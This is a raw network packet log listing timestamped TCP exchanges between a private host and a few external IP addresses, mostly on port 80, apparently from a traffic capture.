Aug 26, 2024 23:29:22.544070959 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.544718981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.544838905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.544888020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.544979095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.544990063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545001030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545011997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545018911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.545036077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.545067072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.545078039 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545089960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545128107 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.545928955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545948029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545958996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.545994043 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546005011 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546046019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546056986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546068907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546078920 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546091080 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546101093 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546104908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546128035 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546137094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546145916 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546148062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546163082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546174049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546192884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546212912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546241999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546253920 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546269894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546283007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546284914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546294928 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546315908 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546340942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546360970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546370983 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546380997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546391010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546401978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546405077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546427011 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546457052 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546700954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546746016 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546756029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546767950 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546782970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546792984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546802998 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546804905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546817064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.546823978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546840906 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.546871901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.598443031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.604211092 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:22.609599113 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.621819019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621831894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621846914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621872902 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.621881962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621893883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621906996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621917963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.621918917 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.621948004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.621974945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622097969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622108936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622119904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622132063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622142076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622143984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622152090 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622163057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622174978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622188091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622188091 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622199059 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622209072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622210979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622221947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622230053 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622234106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622243881 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622248888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622256041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622265100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622268915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622298956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622320890 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622425079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622436047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622446060 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622459888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622471094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622473001 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622481108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622493029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622503042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622512102 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622514009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622524023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622529030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622535944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622545958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622550964 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622556925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622566938 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.622571945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622586012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.622612953 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634263992 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634275913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634287119 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634298086 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634310007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634320021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634325027 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634330988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634346962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634377003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634398937 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634412050 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634423971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634433985 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634443045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634448051 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634454966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634468079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634486914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634510994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634608030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634618998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634629965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634660006 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634685040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634754896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634767056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634777069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634788990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634800911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634802103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634813070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634824991 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634831905 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634835958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634843111 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634846926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634857893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634880066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.634882927 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634910107 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.634929895 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635088921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635098934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635133028 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635268927 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635278940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635288954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635302067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635312080 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635319948 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635327101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635344982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635355949 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635386944 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635412931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635426998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635437965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635447979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635459900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635463953 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635471106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635499001 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635508060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.635586977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.635643959 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.636590958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636601925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636614084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636625051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636636019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636637926 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.636646032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636657953 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.636660099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636689901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.636708975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.636919022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.636962891 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.637803078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637814045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637825966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637836933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637867928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.637908936 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.637948990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637960911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637970924 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637983084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.637990952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.637995958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638008118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638016939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638016939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638022900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638065100 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638144970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638155937 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638165951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638175964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638186932 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638189077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638192892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638202906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638215065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638221979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638226032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638238907 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638259888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638286114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638289928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638298988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638325930 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638339996 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638469934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638482094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638490915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638500929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638511896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638516903 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638523102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638530970 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638534069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.638562918 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.638580084 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.648787975 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:22.655054092 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:22.712084055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712104082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712114096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712152004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712188959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712196112 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712202072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712212086 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712224960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712238073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712241888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712248087 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712261915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712276936 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712291002 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712316990 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712637901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712759972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712771893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712783098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712794065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712810040 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712816000 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712821960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712852001 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712872028 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712873936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712886095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712897062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712908030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712919950 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712919950 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712929964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712940931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712950945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.712953091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.712970972 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713004112 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713023901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713036060 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713046074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713057995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713068962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713078022 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713079929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713089943 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713092089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713108063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713110924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713118076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713129997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713140965 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713171005 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.713192940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713203907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.713242054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724159002 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724170923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724180937 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724194050 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724215031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724240065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724251986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724260092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724270105 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724281073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724287033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724303961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724313974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724332094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724337101 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724344969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724354982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724370003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724384069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724387884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724395990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724411964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724423885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724441051 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724469900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724529028 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724540949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724551916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724566936 CEST	80	49734	185.215.113.16	192.168.2.7
